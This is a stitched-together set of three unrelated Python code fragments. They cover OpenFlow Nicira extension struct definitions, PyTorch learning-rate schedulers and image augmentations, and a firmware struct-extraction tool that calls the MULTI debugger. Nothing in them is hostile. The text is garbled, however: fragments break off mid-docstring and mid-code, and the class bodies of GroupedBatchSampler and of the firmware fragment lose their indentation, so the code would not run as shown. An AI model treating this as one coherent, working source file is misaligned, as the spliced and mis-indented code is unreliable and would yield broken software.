    The immediate is padded to a whole number of 16-bit words as the wire
    format requires. Raises ValueError for a non-positive width.
    """
    if n_bits is None:
        n_bits = NXM_LENGTH(dst) * 8 - dst_ofs
    if n_bits <= 0:
        raise ValueError('Cannot create flow mod spec with 0 bits')
    return nx_flow_mod_spec.parse(_create_header(NX_LEARN_SRC_IMMEDIATE, NX_LEARN_DST_LOAD, n_bits) + common.create_binary(value, (n_bits + 15) // 16 * 2) + _create_field(dst, dst_ofs))[0]
namespace['create_nxfms_loadvalue'] = create_nxfms_loadvalue
def create_nxfms_outputfield(src, src_ofs = 0, n_bits = None):
    """Build an output flow-mod spec: output to the port number read from src.

    When n_bits is None it defaults to the remaining width of src from
    src_ofs. Raises ValueError for a non-positive width.
    """
    if n_bits is None:
        n_bits = NXM_LENGTH(src) * 8 - src_ofs
    if n_bits <= 0:
        raise ValueError('Cannot create flow mod spec with 0 bits')
    return nx_flow_mod_spec.parse(_create_header(NX_LEARN_SRC_FIELD, NX_LEARN_DST_OUTPUT, n_bits) + _create_field(src, src_ofs))[0]
namespace['create_nxfms_outputfield'] = create_nxfms_outputfield
def create_nxfms_outputvalue(dst, value):
    """Build an output flow-mod spec with a literal 16-bit port number."""
    return nx_flow_mod_spec.parse(_create_header(NX_LEARN_SRC_IMMEDIATE, NX_LEARN_DST_OUTPUT, 16) + common.create_binary(value, 2))[0]
namespace['create_nxfms_outputvalue'] = create_nxfms_outputvalue
# Pull the flow-mod flag enum from the protocol namespace for the struct below.
ofp_flow_mod_flags = namespace['ofp_flow_mod_flags']
# NXAST_LEARN action body: a flow_mod template (timeouts, priority, cookie,
# flags, table id) followed by a variable-length list of nx_flow_mod_spec
# elements describing the match/load/output parts of the learned flow.
nx_action_learn = nstruct(
    (uint16, 'idle_timeout'), # /* Idle time before discarding (seconds). */
    (uint16, 'hard_timeout'), # /* Max time before discarding (seconds). */
    (uint16, 'priority'), # /* Priority level of flow entry. */
    (uint64, 'cookie'), # /* Cookie for new flow. */
    (ofp_flow_mod_flags, 'flags'), # /* Either 0 or OFPFF_SEND_FLOW_REM. */
    (uint8, 'table_id'), # /* Table to insert flow entry. */
    (uint8,), # /* Must be zero. */
    (uint16, 'fin_idle_timeout'),# /* Idle timeout after FIN, if nonzero. */
    (uint16, 'fin_hard_timeout'),# /* Hard timeout after FIN, if nonzero. */
    (nx_flow_mod_spec[0], 'specs'), # zero-or-more flow-mod specs
    base = nx_action,
    name = 'nx_action_learn',
    classifyby = (NXAST_LEARN,),
    criteria = lambda x: getattr(x, action_subtype) == NXAST_LEARN,
    init = packvalue(NXAST_LEARN, action_subtype),
)
namespace['nx_action_learn'] = nx_action_learn
'''
/* Action structure for NXAST_FIN_TIMEOUT.
*
* This action changes the idle timeout or hard timeout, or both, of this
* OpenFlow rule when the rule matches a TCP packet with the FIN or RST flag.
* When such a packet is observed, the action reduces the rule's idle timeout
* to 'fin_idle_timeout' and its hard timeout to 'fin_hard_timeout'. This
* action has no effect on an existing timeout that is already shorter than the
* one that the action specifies. A 'fin_idle_timeout' or 'fin_hard_timeout'
* of zero has no effect on the respective timeout.
*
* 'fin_idle_timeout' and 'fin_hard_timeout' are measured in seconds.
* 'fin_hard_timeout' specifies time since the flow's creation, not since the
* receipt of the FIN or RST.
*
* This is useful for quickly discarding learned TCP flows that otherwise will
* take a long time to expire.
*
* This action is intended for use with an OpenFlow rule that matches only a
* single TCP flow. If the rule matches multiple TCP flows (e.g. it wildcards
* all TCP traffic, or all TCP traffic to a particular port), then any FIN or
* RST in any of those flows will cause the entire OpenFlow rule to expire
* early, which is not normally desirable.
*/
'''
# NXAST_FIN_TIMEOUT action body: new timeouts applied to this rule when a
# TCP FIN/RST is observed; zero leaves the respective timeout unchanged.
nx_action_fin_timeout = nstruct(
    (uint16, 'fin_idle_timeout'), # /* New idle timeout, if nonzero. */
    (uint16, 'fin_hard_timeout'), # /* New hard timeout, if nonzero. */
    (uint16,), # unnamed trailing field (presumably padding - confirm against nicira-ext.h)
    base = nx_action,
    name = 'nx_action_fin_timeout',
    criteria = lambda x: getattr(x, action_subtype) == NXAST_FIN_TIMEOUT,
    classifyby = (NXAST_FIN_TIMEOUT,),
    init = packvalue(NXAST_FIN_TIMEOUT, action_subtype)
)
namespace['nx_action_fin_timeout'] = nx_action_fin_timeout
'''
/* Action structure for NXAST_BUNDLE and NXAST_BUNDLE_LOAD.
*
* The bundle actions choose a slave from a supplied list of options.
* NXAST_BUNDLE outputs to its selection. NXAST_BUNDLE_LOAD writes its
* selection to a register.
*
* The list of possible slaves follows the nx_action_bundle structure. The size
* of each slave is governed by its type as indicated by the 'slave_type'
* parameter. The list of slaves should be padded at its end with zeros to make
* the total length of the action a multiple of 8.
*
* Switches infer from the 'slave_type' parameter the size of each slave. All
* implementations must support the NXM_OF_IN_PORT 'slave_type' which indicates
* that the slaves are OpenFlow port numbers with NXM_LENGTH(NXM_OF_IN_PORT) ==
* 2 byte width. Switches should reject actions which indicate unknown or
* unsupported slave types.
*
* Switches use a strategy dictated by the 'algorithm' parameter to choose a
* slave. If the switch does not support the specified 'algorithm' parameter,
* it should reject the action.
*
* Several algorithms take into account liveness when selecting slaves. The
* liveness of a slave is implementation defined (with one exception), but will
* generally take into account things like its carrier status and the results
* of any link monitoring protocols which happen to be running on it. In order
* to give controllers a place-holder value, the OFPP_NONE port is always
* considered live.
*
* Some slave selection strategies require the use of a hash function, in which
| |
<reponame>Hidberg/Landmark2019-1st-and-3rd-Place-Solution
import itertools
import random
import math
import albumentations.augmentations.functional as F
import cv2
from PIL import Image
import numpy as np
import torch
from albumentations import ImageOnlyTransform
from torch.optim.lr_scheduler import _LRScheduler
from torch.utils.data.sampler import BatchSampler
from torch.utils.data.sampler import Sampler
from torch._six import int_classes as _int_classes
from src.autoaugment import ImageNetPolicy
class PiecewiseCyclicalLinearLR(_LRScheduler):
    r"""Set the learning rate of each parameter group using a piecewise
    cyclical linear schedule.

    When last_epoch=-1, sets initial lr as lr.

    References:
        Loss Surfaces, Mode Connectivity, and Fast Ensembling of DNNs
        https://arxiv.org/pdf/1802.10026
        Exploring loss function topology with cyclical learning rates
        https://arxiv.org/abs/1702.04283
    """

    def __init__(self, optimizer, c, alpha1=1e-2, alpha2=5e-4, last_epoch=-1):
        """
        :param c: cycle length in epochs
        :param alpha1: lr upper bound of cycle
        :param alpha2: lr lower bound of cycle
        """
        self.c = c
        self.alpha1 = alpha1
        self.alpha2 = alpha2
        super(PiecewiseCyclicalLinearLR, self).__init__(optimizer, last_epoch)

    def get_lr(self):
        # Position within the current cycle, normalized to (0, 1].
        ti = ((self.last_epoch - 1) % self.c + 1) / self.c
        if 0 <= ti <= 0.5:
            # First half: linear interpolation from alpha1 down to alpha2.
            lr = (1 - 2 * ti) * self.alpha1 + 2 * ti * self.alpha2
        elif 0.5 < ti <= 1.0:
            # Second half: linear interpolation from alpha2 back up to alpha1.
            lr = (2 - 2 * ti) * self.alpha2 + (2 * ti - 1) * self.alpha1
        else:
            raise ValueError('t(i) is out of range [0,1].')
        # The schedule is independent of base_lr, so every parameter group
        # receives the same value; compute it once instead of per group.
        return [lr] * len(self.base_lrs)
class PolyLR(_LRScheduler):
    """Polynomial decay schedule: lr = base_lr * (1 - epoch / max_epoch) ** power.

    The argument name "epoch" also can be thought as "iter".
    """

    def __init__(self, optimizer, power=0.9, max_epoch=4e4, last_epoch=-1):
        self.power = power
        self.max_epoch = max_epoch
        self.last_epoch = last_epoch
        super(PolyLR, self).__init__(optimizer, last_epoch)

    def get_lr(self):
        # The decay factor is shared by all parameter groups.
        decay = (1.0 - (self.last_epoch / self.max_epoch)) ** self.power
        return [base_lr * decay for base_lr in self.base_lrs]
class WarmupCosineAnnealingLR(torch.optim.lr_scheduler._LRScheduler):
    """Cosine annealing scheduler preceded by a warmup phase.

    For the first `warmup_iters` epochs the learning rate ramps toward the
    base lr (linearly, or held at a constant fraction); afterwards it follows
    a cosine annealing curve down to `eta_min` over the remaining epochs.

    Args:
        optimizer (Optimizer): Wrapped optimizer.
        T_max (int): Maximum number of iterations.
        eta_min (float): Minimum learning rate. Default: 0.
        warmup_factor (float): Starting fraction of the base lr.
        warmup_iters (int): Length of the warmup phase in iterations.
        warmup_method (str): "constant" or "linear".
        last_epoch (int): The index of last epoch. Default: -1.

    SGDR: Stochastic Gradient Descent with Warm Restarts,
    https://arxiv.org/abs/1608.03983
    """

    def __init__(
        self,
        optimizer,
        T_max,
        eta_min,
        warmup_factor=1.0 / 3,
        warmup_iters=500,
        warmup_method="linear",
        last_epoch=-1,
    ):
        if warmup_method not in ("constant", "linear"):
            raise ValueError(
                "Only 'constant' or 'linear' warmup_method accepted"
                "got {}".format(warmup_method)
            )
        self.T_max = T_max
        self.eta_min = eta_min
        self.warmup_factor = warmup_factor
        self.warmup_iters = warmup_iters
        self.warmup_method = warmup_method
        super(WarmupCosineAnnealingLR, self).__init__(optimizer, last_epoch)

    def get_lr(self):
        # Dispatch on phase: warmup first, cosine annealing afterwards.
        if self.last_epoch < self.warmup_iters:
            return self.get_lr_warmup()
        return self.get_lr_cos_annealing()

    def get_lr_warmup(self):
        if self.warmup_method == "constant":
            factor = self.warmup_factor
        else:
            # Linear ramp from warmup_factor at epoch 0 to 1.0 at warmup_iters.
            progress = self.last_epoch / self.warmup_iters
            factor = self.warmup_factor * (1 - progress) + progress
        return [factor * base_lr for base_lr in self.base_lrs]

    def get_lr_cos_annealing(self):
        # Shift the schedule so the cosine phase starts right after warmup.
        epoch = self.last_epoch - self.warmup_iters
        span = self.T_max - self.warmup_iters
        cos_factor = (1 + math.cos(math.pi * epoch / span)) / 2
        return [self.eta_min + (base_lr - self.eta_min) * cos_factor
                for base_lr in self.base_lrs]
def _pad_const(x, target_height, target_width, value=255, center=True, pad_loc_seed=None):
    """Pad image `x` with a constant value up to (target_height, target_width).

    When `center` is False the padding split is randomized; `pad_loc_seed`
    reseeds the global `random` module so the split is reproducible.
    Dimensions already at or above the target are left unpadded.
    """
    random.seed(pad_loc_seed)

    def _split_pad(total, current):
        # Padding before the content; the remainder goes after it.
        if current >= total:
            return 0, 0
        if center:
            before = int((total - current) / 2.0)
        else:
            before = random.randint(a=0, b=total - current)
        return before, total - current - before

    h_pad_top, h_pad_bottom = _split_pad(target_height, x.shape[0])
    w_pad_left, w_pad_right = _split_pad(target_width, x.shape[1])
    return cv2.copyMakeBorder(x, h_pad_top, h_pad_bottom, w_pad_left, w_pad_right,
                              cv2.BORDER_CONSTANT, value=value)
class RandomCropThenScaleToOriginalSize(ImageOnlyTransform):
    """Crop a random part of the input and rescale it to some size.

    Args:
        limit (float): maximum factor range for cropping region size.
        interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:
            cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.
            Default: cv2.INTER_LINEAR.
        pad_value (int): pixel value for padding.
        p (float): probability of applying the transform. Default: 1.
    """

    def __init__(self, limit=0.1, interpolation=cv2.INTER_LINEAR, pad_value=0, p=1.0):
        super(RandomCropThenScaleToOriginalSize, self).__init__(p)
        self.limit = limit
        self.interpolation = interpolation
        self.pad_value = pad_value

    def apply(self, img, height_scale=1.0, width_scale=1.0, h_start=0, w_start=0, interpolation=cv2.INTER_LINEAR,
              pad_value=0, pad_loc_seed=None, **params):
        # Crop a (height_scale, width_scale) fraction of the image at the
        # sampled location, then resize the crop back to the original size.
        img_height, img_width = img.shape[:2]
        crop_height, crop_width = int(img_height * height_scale), int(img_width * width_scale)
        crop = self.random_crop(img, crop_height, crop_width, h_start, w_start, pad_value, pad_loc_seed)
        return F.resize(crop, img_height, img_width, interpolation)

    def get_params(self):
        # Sample per-call randomness; albumentations forwards this dict to apply().
        height_scale = 1.0 + random.uniform(-self.limit, self.limit)
        width_scale = 1.0 + random.uniform(-self.limit, self.limit)
        return {'h_start': random.random(),
                'w_start': random.random(),
                'height_scale': height_scale,
                'width_scale': width_scale,
                'pad_loc_seed': random.random()}

    def update_params(self, params, **kwargs):
        # Inject configured interpolation/pad_value plus the image geometry
        # into the params dict that apply() receives.
        if hasattr(self, 'interpolation'):
            params['interpolation'] = self.interpolation
        if hasattr(self, 'pad_value'):
            params['pad_value'] = self.pad_value
        params.update({'cols': kwargs['image'].shape[1], 'rows': kwargs['image'].shape[0]})
        return params

    @staticmethod
    def random_crop(img, crop_height, crop_width, h_start, w_start, pad_value=0, pad_loc_seed=None):
        # Pad first when the requested crop is larger than the image
        # (possible because the scale factors may exceed 1.0).
        height, width = img.shape[:2]
        if height < crop_height or width < crop_width:
            img = _pad_const(img, crop_height, crop_width, value=pad_value, center=False, pad_loc_seed=pad_loc_seed)
        # h_start / w_start in [0, 1) select the crop origin.
        y1 = max(int((height - crop_height) * h_start), 0)
        y2 = y1 + crop_height
        x1 = max(int((width - crop_width) * w_start), 0)
        x2 = x1 + crop_width
        img = img[y1:y2, x1:x2]
        return img
class AutoAugmentWrapper(ImageOnlyTransform):
    """Albumentations wrapper around the ImageNet AutoAugment policy."""

    def __init__(self, p=1.0):
        super(AutoAugmentWrapper, self).__init__(p)
        self.autoaugment = ImageNetPolicy()

    def apply(self, img, **params):
        # PIL round-trip: the policy operates on PIL images while
        # albumentations passes numpy arrays.
        augmented = self.autoaugment(Image.fromarray(img))
        return np.asarray(augmented)
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
class GroupedBatchSampler(BatchSampler):
"""
Wraps another sampler to yield a mini-batch of indices.
It enforces that elements from the same group should appear in groups of batch_size.
It also tries to provide mini-batches which follows an ordering which is
as close as possible to the ordering from the original sampler.
Arguments:
sampler (Sampler): Base sampler.
batch_size (int): Size of mini-batch.
drop_uneven (bool): If ``True``, the sampler will drop the batches whose
size is less than ``batch_size``
"""
def __init__(self, sampler, group_ids, batch_size, drop_uneven=False):
if not isinstance(sampler, Sampler):
raise ValueError(
"sampler should be an instance of "
"torch.utils.data.Sampler, but got sampler={}".format(sampler)
)
self.sampler = sampler
self.group_ids = torch.as_tensor(group_ids)
assert self.group_ids.dim() == 1
self.batch_size = batch_size
self.drop_uneven = drop_uneven
self.groups = torch.unique(self.group_ids).sort(0)[0]
self._can_reuse_batches = False
def _prepare_batches(self):
    """Build the list of batches for one pass over the wrapped sampler.

    Returns a list of lists of dataset indices. Each batch contains only
    indices sharing one group id, and batch order approximately follows
    the underlying sampler's order (keyed on each batch's first element).
    """
    dataset_size = len(self.group_ids)
    # get the sampled indices from the sampler
    sampled_ids = torch.as_tensor(list(self.sampler))
    # potentially not all elements of the dataset were sampled
    # by the sampler (e.g., DistributedSampler).
    # construct a tensor which contains -1 if the element was
    # not sampled, and a non-negative number indicating the
    # order where the element was sampled.
    # for example. if sampled_ids = [3, 1] and dataset_size = 5,
    # the order is [-1, 1, -1, 0, -1]
    order = torch.full((dataset_size,), -1, dtype=torch.int64)
    order[sampled_ids] = torch.arange(len(sampled_ids))
    # get a mask with the elements that were sampled
    mask = order >= 0
    # find the elements that belong to each individual cluster
    clusters = [(self.group_ids == i) & mask for i in self.groups]
    # get relative order of the elements inside each cluster
    # that follows the order from the sampler
    relative_order = [order[cluster] for cluster in clusters]
    # with the relative order, find the absolute order in the
    # sampled space
    permutation_ids = [s[s.sort()[1]] for s in relative_order]
    # permute each cluster so that they follow the order from
    # the sampler
    permuted_clusters = [sampled_ids[idx] for idx in permutation_ids]
    # splits each cluster in batch_size, and merge as a list of tensors
    splits = [c.split(self.batch_size) for c in permuted_clusters]
    merged = tuple(itertools.chain.from_iterable(splits))
    # now each batch internally has the right order, but
    # they are grouped by clusters. Find the permutation between
    # different batches that brings them as close as possible to
    # the order that we have in the sampler. For that, we will consider the
    # ordering as coming from the first element of each batch, and sort
    # correspondingly
    first_element_of_batch = [t[0].item() for t in merged]
    # get and inverse mapping from sampled indices and the position where
    # they occur (as returned by the sampler)
    inv_sampled_ids_map = {v: k for k, v in enumerate(sampled_ids.tolist())}
    # from the first element in each batch, get a relative ordering
    first_index_of_batch = torch.as_tensor(
        [inv_sampled_ids_map[s] for s in first_element_of_batch]
    )
    # permute the batches so that they approximately follow the order
    # from the sampler
    permutation_order = first_index_of_batch.sort(0)[1].tolist()
    # finally, permute the batches
    batches = [merged[i].tolist() for i in permutation_order]
    if self.drop_uneven:
        # drop trailing partial batches when requested
        kept = []
        for batch in batches:
            if len(batch) == self.batch_size:
                kept.append(batch)
        batches = kept
    return batches
def __iter__(self):
if self._can_reuse_batches:
batches = self._batches
self._can_reuse_batches = False
else:
batches = self._prepare_batches()
| |
in txtLine): continue
if dataObjectName + ';' in txtLine or dataObjectName + '[' in txtLine:
txtLine = txtLine.strip()
txtLine = re.sub('^ +', '', txtLine)
txtLine = re.sub(' +', ' ', txtLine)
if objectDeclarationString.search(txtLine):
m = objectDeclarationString.search(txtLine)
typeDefName = m.group(1)
return typeDefName
elif objectDeclarationStringStruct.search(txtLine):
m = objectDeclarationStringStruct.search(txtLine)
typeDefName = m.group(1)
return typeDefName
return typeDefName
def getAllFwVersionMacros(self):
    """Collect all *_MAJOR / *_MINOR firmware version macro definitions.

    Scans every file in self.fileList and appends [macro_name, value]
    pairs to self.versionList. Files are opened with a context manager so
    handles are closed deterministically (the original `for line in
    open(...)` leaked them until garbage collection).
    """
    # Raw strings so '\d' reaches the regex engine verbatim.
    majorPattern = re.compile(r'#define +([a-zA-Z0-9_]+_MAJOR) +(\d+)')
    minorPattern = re.compile(r'#define +([a-zA-Z0-9_]+_MINOR) +(\d+)')
    for filepath in self.fileList:
        with open(filepath, 'r') as srcFile:
            for txtLine in srcFile:
                # matchSequence[2] filters comment lines (module-level pattern).
                if matchSequence[2].match(txtLine):
                    continue
                # Search each pattern once instead of search-then-search-again.
                m = majorPattern.search(txtLine) or minorPattern.search(txtLine)
                if m:
                    self.versionList.append([m.group(1), m.group(2)])
    return
def getFwMacroValue(self, macroName):
    """Return the integer value of `#define macroName ...`, or None if absent.

    Handles decimal and hexadecimal (0x...) definitions; the first match
    across self.fileList wins.

    NOTE(review): macroName is interpolated into the pattern unescaped, so
    regex metacharacters in the name would misfire; consider re.escape.
    """
    decimalPattern = re.compile(r'#define +%s +(\d+)' % macroName)
    hexPattern = re.compile(r'#define +%s +(0x[0-9a-fA-F]+)' % macroName)
    for filepath in self.fileList:
        with open(filepath, 'r') as srcFile:
            for txtLine in srcFile:
                # matchSequence[2] filters comment lines (module-level pattern).
                if matchSequence[2].match(txtLine):
                    continue
                m = decimalPattern.search(txtLine)
                if m:
                    return int(m.group(1))
                m = hexPattern.search(txtLine)
                if m:
                    return int(m.group(1), 16)
    return None
def getTypeDefStruct(self, typeDefName):
    """Locate the struct declaration for `typeDefName` in self.fileList.

    Returns (filepath, typeDefName, lineNum) where lineNum is the 0-based
    index of the matching line, or (None, None, None) when not found.
    Recognizes three declaration shapes: `} name;` (end of struct body),
    `typedef other_t name;`, and `other_t name[` (array declaration).
    """
    endOfStructPattern = re.compile(r'\} %s;' % typeDefName)
    typedefAliasPattern = re.compile(r'typedef +([a-zA-Z0-9_]+_t) +%s;' % typeDefName)
    arrayDeclPattern = re.compile(r'([a-zA-Z0-9_]+_t) +%s([[])' % typeDefName)
    for filepath in self.fileList:
        # Context manager closes the handle even if a regex below raises.
        with open(filepath, 'r') as iFile:
            lines = iFile.readlines()
        for i, rawLine in enumerate(lines):
            # Cheap substring pre-filter before any regex work.
            if typeDefName not in rawLine:
                continue
            # Normalize whitespace: strip ends, collapse internal runs.
            txtLine = re.sub(' +', ' ', re.sub('^ +', '', rawLine.strip()))
            # matchSequence[2] filters comment lines (module-level pattern).
            if matchSequence[2].match(txtLine):
                continue
            if (endOfStructPattern.search(txtLine) or
                    typedefAliasPattern.search(txtLine) or
                    arrayDeclPattern.search(txtLine)):
                return filepath, typeDefName, i  ### Last param is 0-based lineNum where the typeDefName is found
    return None, None, None
def isUserAdmin(self):
    """Return True when running with Windows administrator rights.

    On non-Windows platforms (where ctypes.windll does not exist) or when
    the shell32 call fails, returns False instead of raising. The bare
    `except:` was narrowed so KeyboardInterrupt/SystemExit still propagate.
    """
    try:
        return bool(ctypes.windll.shell32.IsUserAnAdmin())
    except (AttributeError, OSError):
        # AttributeError: not on Windows; OSError: the call itself failed.
        return False
def runShellCmd(self, multicmd):
    """Re-launch the current Python interpreter elevated (UAC 'runas') with the given parameters.

    Windows-only: relies on the pywin32 `shell` module (ShellExecuteEx).
    NOTE(review): `multicmd` flows into the elevated command line as-is —
    ensure callers never pass untrusted input.
    """
    shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=multicmd)
def executeMultiScript(self, command):
    """Run a GHS MULTI script command on the current platform.

    The Linux and Windows branches are currently identical; they are kept
    separate as deliberate extension points. Other platforms run nothing.

    Args:
        command: fully formed MULTI command line.
    """
    try:
        # print("Platform: ", str(platform.system()))
        if platform.system() == 'Linux':
            ### Just in case we need to do something different for Linux
            self.runCmd(command)
        elif platform.system() == 'Windows':
            ### Just in case we need to do something different for Windows
            self.runCmd(command)
        print("\nCommand: %s" % command)
    except Exception:
        # Narrowed from a bare except so SystemExit/KeyboardInterrupt propagate.
        print("Failed Multi execution")
        if ENABLE_DEBUG_ENTER:
            quit(10)
def appendNewSubStructs(self, tempSubStructDefFile):
    """Merge newly extracted sub-struct definitions into the master file.

    When the master file already exists, the first lines of the temp file
    (the MULTI debugger startup banner) are skipped before appending;
    otherwise the temp file is copied verbatim into a new master file.

    Args:
        tempSubStructDefFile: path of the temporary MULTI output file.
    """
    try:
        if os.path.isfile(tempSubStructDefFile):
            with open(tempSubStructDefFile, 'r') as src:
                lines = src.readlines()
            if os.path.isfile(self.subStructDefFile):
                # NOTE(review): the slice skips 6 lines although the original
                # comment said "first 7" -- behavior preserved; confirm the
                # actual MULTI banner length.
                with open(self.subStructDefFile, 'a+') as dst:
                    dst.writelines(lines[6:])
            else:
                with open(self.subStructDefFile, 'w+') as dst:
                    dst.writelines(lines)
                if ENABLE_DEBUG_ENTER:
                    quit(11)
        else:
            if ENABLE_DEBUG_ENTER:
                quit(12)
    except Exception:
        # Narrowed from a bare except so SystemExit/KeyboardInterrupt propagate.
        print("Failed appendNewSubStructs execution")
        if ENABLE_DEBUG_ENTER:
            quit(13)
def extractArraySubStructs(self):
    """Find struct/union array members and queue their types for extraction.

    Reads the master struct definition file on the initial call, or the
    sub-struct file on recursive calls, collects array-typed struct/union
    member type names not yet seen, writes a MULTI command script that dumps
    them, runs MULTI, then recurses while new types keep appearing.
    """
    tempSubStructList = set()
    if self.recursive:
        if self.verbose:
            print("\n recursive extractArraySubStructs call")
        if os.path.isfile(self.subStructDefFile):
            fp = open(self.subStructDefFile, 'r')
        else:
            self.recursive = False
            if ENABLE_DEBUG_ENTER:
                quit(14)
            return
    else:
        if self.verbose:
            print("\n Initial extractArraySubStructs call")
        if os.path.isfile(self.structDefFile):
            fp = open(self.structDefFile, 'r')
        else:
            self.recursive = False
            if ENABLE_DEBUG_ENTER:
                quit(15)
            return
    lines = fp.readlines()
    fp.close()
    objectInStructArray = re.compile(r'struct ([a-zA-Z0-9_]+_t) (([a-zA-Z0-9_]+)([[]))')
    objectInUnionArray = re.compile(r'union ([a-zA-Z0-9_]+_t) (([a-zA-Z0-9_]+)([[]))')
    for line in lines:
        # struct takes precedence over union, as in the original elif chain.
        m = objectInStructArray.search(line) or objectInUnionArray.search(line)
        if m and (m.group(1) not in self.subStructList):
            tempSubStructList.add(m.group(1))
            self.subStructList.add(m.group(1))
    # NOTE(review): mixes self.options.verbose here with self.verbose above --
    # preserved as found; confirm which flag is authoritative.
    if self.options.verbose:
        print("subStructList: ", self.subStructList)
        print("tempSubStructList:", tempSubStructList)
    with open(self.subStructMultiCmdFile, 'w+') as multiCmdFile:
        multiCmdFile.write('_LINES = 1000\n')
        # Convert the set once -- the original rebuilt list(set) on every
        # access, which was O(n^2) per script line.
        for name in list(tempSubStructList):
            if name is not None:
                multiCmdFile.write('mprintf(\"SubstructBegin==>%s\\n\")\n' % name)
                multiCmdFile.write(name + '\n')
                multiCmdFile.write("sizeof(%s)\n" % name)
                multiCmdFile.write('mprintf(\"SubstructEnd==>%s\\n\")\n' % name)
            else:
                # Defensive branch kept from the original; a set populated only
                # from regex match groups should never actually contain None.
                multiCmdFile.write('mprintf(\"SubstructBegin==>%s\\n\")\n' % name)
                multiCmdFile.write('struct {\n')
                multiCmdFile.write('{ ' + name + '\n')
                multiCmdFile.write("0")
                multiCmdFile.write('mprintf(\"SubstructEnd==>%s\\n\")\n' % name)
        if ENABLE_DEBUG_ENTER:
            quit(16)
        multiCmdFile.write('quitall\n')  ### Exit multi gracefully
    tempSubStructDefFile = os.path.join(self.outDir, fname_tempSubStructDefs)
    if len(tempSubStructList) > 0:
        if self.recursive:
            command = '%s %s -nodisplay -p %s -RO %s' % (
                self.multiExe, self.elfFile, self.subStructMultiCmdFile, tempSubStructDefFile)
        else:
            command = '%s %s -nodisplay -p %s -RO %s' % (
                self.multiExe, self.elfFile, self.subStructMultiCmdFile, self.subStructDefFile)
        if platform.system() == 'Linux':
            ### Just in case we need to do something different for Linux
            self.runCmd(command)
        elif platform.system() == 'Windows':
            ### Just in case we need to do something different for Windows
            self.runCmd(command)
        if self.recursive:
            if os.path.exists(tempSubStructDefFile):
                print(" Appending new sub structures 1.")
                self.appendNewSubStructs(tempSubStructDefFile)
            if os.path.exists(tempSubStructDefFile):
                print(" Deleting temp structures 2.")
                os.remove(tempSubStructDefFile)
        # Recurse: newly found sub-structs may themselves contain arrays.
        self.recursive = True
        print(" Extracting new sub structures 3.")
        self.extractArraySubStructs()
def searchVersionMajorMinor(self, fileName, typeDefStructName, lineNum):
    """Resolve the MAJOR/MINOR version macros documented on a struct's
    ``testCmdVersion_t`` member.

    Args:
        fileName: file containing the struct definition.
        typeDefStructName: typedef name expected on line ``lineNum``.
        lineNum: 0-based line number of the typedef's closing line.

    Returns:
        ``(majorMacro, majorValue, minorMacro, minorValue)``. Macro names are
        None and values keep the 0xBADD/0xC0DE sentinels when unresolved.
        BUGFIX: the error paths previously returned 2-tuples while the
        success path returned a 4-tuple, breaking 4-way unpacking at callers;
        all paths now return 4 values.
    """
    verMajorMacro = None
    verMinorMacro = None
    versionMajor = 0xBADD  # sentinel: "major not resolved"
    versionMinor = 0xC0DE  # sentinel: "minor not resolved"
    with open(fileName, 'r') as iFile:
        lines = iFile.readlines()
    if typeDefStructName not in lines[lineNum]:
        print("Incorrect/inconsistent parameters being passed into searchVersionMajorMinor")
        return None, versionMajor, None, versionMinor
    # Walk backwards to the 'typedef struct'/'typedef union' opening line.
    # BUGFIX: '(?:union|struct)' replaces '[union|struct]', which was a
    # character class matching any single one of those letters (so e.g.
    # 'typedef int' also matched). Scan now also includes line 0.
    opening = re.compile(r'typedef (?:union|struct)')
    structStartLine = None
    for i in range(lineNum, -1, -1):
        if opening.search(lines[i]):
            structStartLine = i
            break
    if structStartLine is None:
        return None, versionMajor, None, versionMinor
    # BUGFIX: search and extraction now use the same character class; the
    # original checked with '[\/<, ]' but extracted with '[\/< ]', so a
    # comma-preceded macro made m None and crashed on m.group(1).
    macroMajor = re.compile(r'[\/<, ]([A-Z0-9_]+_MAJOR)')
    macroMinor = re.compile(r'[\/<, ]([A-Z0-9_]+_MINOR)')
    for i in range(structStartLine, lineNum):
        line = lines[i].strip()
        if re.search(r'^\/\/', line):  # skip pure comment lines
            continue
        if line == '':
            continue
        if ('testCmdVersion_t' in line) and ('_MAJOR' in line) and ('_MINOR' in line):
            m = macroMajor.search(line)
            if m:
                verMajorMacro = m.group(1)
            m = macroMinor.search(line)
            if m:
                verMinorMacro = m.group(1)
    # Resolve the macro names against the pre-scanned version list.
    for v in self.versionList:
        if (verMajorMacro is not None) and (verMajorMacro in v[0]):
            versionMajor = int(v[1])
        if (verMinorMacro is not None) and (verMinorMacro in v[0]):
            versionMinor = int(v[1])
        if (versionMajor != 0xBADD) and (versionMinor != 0xC0DE):
            break
    return verMajorMacro, versionMajor, verMinorMacro, versionMinor
def getAllStructNames(self):
    """Populate ``self.structNameList`` from the struct and sub-struct
    definition files, creating empty files when they are missing.

    The regex used to recognize a struct name depends on the TRUNK
    (NAND/SXP) and ENABLE_CLANG module flags -- behavior preserved.
    """
    try:
        if os.path.isfile(self.structDefFile):
            with open(self.structDefFile, 'r') as iFile:
                lines = iFile.readlines()
            isDetected = None
            for l in lines:
                if TRUNK == "SXP" and not ENABLE_CLANG:
                    isDetected = matchSequence[22].search(l)
                elif TRUNK == "NAND" and not ENABLE_CLANG:
                    isDetected = matchSequence[21].search(l)
                elif ENABLE_CLANG:
                    isDetected = detectedStructureMainName.search(l)
                if isDetected:
                    m = isDetected
                    # De-duplicate while preserving discovery order.
                    if m.group(1) not in self.structNameList:
                        self.structNameList.append(m.group(1))
        else:
            # Create an empty master definition file so later stages don't fail.
            open(self.structDefFile, 'w+').close()
        try:
            if os.path.isfile(self.subStructDefFile):
                with open(self.subStructDefFile, 'r') as iFile:
                    lines = iFile.readlines()
                # NOTE(review): isDetected is not reset per line, so a line
                # matched by none of the branches reuses the previous match --
                # preserved from the original; confirm intent.
                for l in lines:
                    if TRUNK == "NAND" and not ENABLE_CLANG:
                        isDetected = matchSequence[23].search(l)
                    elif TRUNK == "SXP" and not ENABLE_CLANG:
                        isDetected = matchSequence[24].search(l)
                    elif ENABLE_CLANG:
                        isDetected = detectedStructureSubName.search(l)
                    if isDetected:
                        m = isDetected
                        if m.group(1) not in self.structNameList:
                            self.structNameList.append(m.group(1))
            else:
                open(self.subStructDefFile, 'w+').close()
                if ENABLE_DEBUG_ENTER:
                    quit(17)
        except BaseException as error:
            # The original also had a bare 'except:' after this handler;
